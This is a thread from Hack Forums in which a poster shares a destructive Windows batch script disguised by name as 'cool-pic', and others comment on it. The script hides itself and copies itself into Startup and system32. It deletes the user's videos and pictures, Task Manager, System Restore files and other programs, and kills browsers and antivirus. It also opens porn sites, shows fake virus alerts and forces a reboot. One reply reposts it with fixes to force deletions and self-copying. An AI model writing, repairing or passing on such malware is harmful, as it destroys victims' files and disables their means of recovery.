Hack Forums

Full Version: destroying batch
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
The batch will make itself hidden, disable mouse and keyboard, your pc will not system restore, copy itself to system32 and some other things. Credit goes to:

My keyboard/mouse
youtube.com

@echo off
title cool-pic
attrib +h cool-pic.bat
cd "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "cool-pic.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
del C:\Documents and Settings\All Users\My Documents\My Videos
del C:\Documents and Settings\All Users\My Documents\My Pictures
tskill firefox.exe
tskill netscape
tskill iexplore
tskill firefox
tskill ybrowser
tskill limewire
tskill AIM6
rundll keybored, disable
rundll mouse, disable
tskill mcaffe security centre module
del "%systemroot%\system32\restore/rstrui.ex e"
del C:\WINDOWS\system32\Restore\srdiag.exe
del C:\WINDOWS\system32\taskmgr.exe
del C:\Program Files\Compact Wireless-G USB Network Adapter with SpeedBooster\Linksys.exe
del C:\Program Files\Compact Wireless-G USB Network Adapter with SpeedBooster\GEMWEP.DLL
del C:\WINDOWS\system32\windows media\server\wmsservertypelib.dll
del C:\Program Files\Internet Explorer\iexplore.exe
del C:\Program Files\Movie Maker\moviemk.exe
copy "cool-pic.bat" "C:\windows\system32"
start http://www.blowbucks.com
start http://www.bravegirls.com
if exist "C:\Program Files\Adobe" copy "cool-pic.bat" "C:\Program Files\Adobe"
rundll32 user32.dll.SwapMouseButton
time 12:00
at 12:01 start http://www.pussiesonline.com
at 12:02 msg * Windows Has Found A Virus Please Run A Anti-Virus Scan
at 12:03 msg * Windows Has Found A Virus Please Run A Anti-Virus Scan
at 12:04 shutdown -r -t 50 -c
lol nice .Bat
@echo off
title cool-pic
attrib +h cool-pic.bat [Forgot to say to save it as cool-pic.bat + it's %0.]
cd "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" [ It's cd "%systemdrive%\documents and settings\all users...."
copy "cool-pic.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"[Just put copy %0 it will copy it to startup]
del C:\Documents and Settings\All Users\My Documents\My Videos [ You should add /F /Q just so you force the delete.Same goes below.]
del C:\Documents and Settings\All Users\My Documents\My Pictures
tskill firefox.exe[It's firefox without the .exe][Add /A and /IM]
tskill netscape
tskill iexplore
tskill firefox
tskill ybrowser
tskill limewire
tskill AIM6
rundll keybored, disable [That doesn't work,nor the one below.]
rundll mouse, disable
tskill mcaffe security centre module [WTF?]
del "%systemroot%\system32\restore/rstrui.ex e" [Wrong directory + slashes + no need for the " "]
del C:\WINDOWS\system32\Restore\srdiag.exe[Add /F /Q]
del C:\WINDOWS\system32\taskmgr.exe
del C:\Program Files\Compact Wireless-G USB Network Adapter with SpeedBooster\Linksys.exe
del C:\Program Files\Compact Wireless-G USB Network Adapter with SpeedBooster\GEMWEP.DLL
del C:\WINDOWS\system32\windows media\server\wmsservertypelib.dll
del C:\Program Files\Internet Explorer\iexplore.exe
del C:\Program Files\Movie Maker\moviemk.exe[Add " " for the ones with spaces inside]
copy "cool-pic.bat" "C:\windows\system32"[It's copy %0]
start http://www.blowbucks.com
start http://www.bravegirls.com
if exist "C:\Program Files\Adobe" copy "cool-pic.bat" "C:\Program Files\Adobe"
rundll32 user32.dll.SwapMouseButton [Doesn't work]
time 12:00
at 12:01 start http://www.pussiesonline.com [ it's not at ,it's If %time%==12:01 start ...]
at 12:02 msg * Windows Has Found A Virus Please Run A Anti-Virus Scan
at 12:03 msg * Windows Has Found A Virus Please Run A Anti-Virus Scan
at 12:04 shutdown -r -t 50 -c


Code is copied tho.
uh-huh,Mathias' virusmaker V3.0 had that code in it.
and I don't think the mouse disable thing works for other than Win 98/95
wait a minute
i have seen that batch before..........
Post in the Batch Section.
i like this batch... i dont care who made it,but its cool :D
....Yeye
The keyboard/mouse disable doesn't work. (Well on my Windows the commands "tskill, rundll" don't work maybe that's the problem) Anyway cool batch.
Reference URL's